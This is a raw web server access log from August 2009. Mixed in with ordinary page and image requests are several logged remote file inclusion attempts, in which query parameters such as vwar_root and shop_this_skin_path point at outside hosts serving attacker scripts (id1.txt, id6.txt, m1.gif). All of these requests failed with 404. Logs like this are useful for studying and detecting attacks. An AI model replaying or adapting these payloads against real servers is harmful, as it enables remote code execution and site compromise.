172.16.1.176 - - [05/Aug/2009:09:29:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [05/Aug/2009:09:29:37 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.23.191.23 - - [05/Aug/2009:09:30:03 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
79.23.191.23 - - [05/Aug/2009:09:30:11 -0400] "GET /logs/access_log.Q109070300//includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://roxxxx.altervista.org/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
96.244.122.222 - - [05/Aug/2009:09:30:13 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
96.244.122.222 - - [05/Aug/2009:09:30:16 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37789 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
218.208.21.7 - - [05/Aug/2009:09:30:21 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.145.160.123 - - [05/Aug/2009:09:30:27 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.koreavortex.co.kr/.../id6.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:30:27 -0400] "GET /logs/access_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.koreavortex.co.kr/.../id6.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:30:27 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.koreavortex.co.kr/.../id6.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
218.145.160.123 - - [05/Aug/2009:09:30:28 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.koreavortex.co.kr/.../id6.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
96.244.122.222 - - [05/Aug/2009:09:30:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0196064648851600BCF306A+M37+ENG HTTP/1.1" 200 36150 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
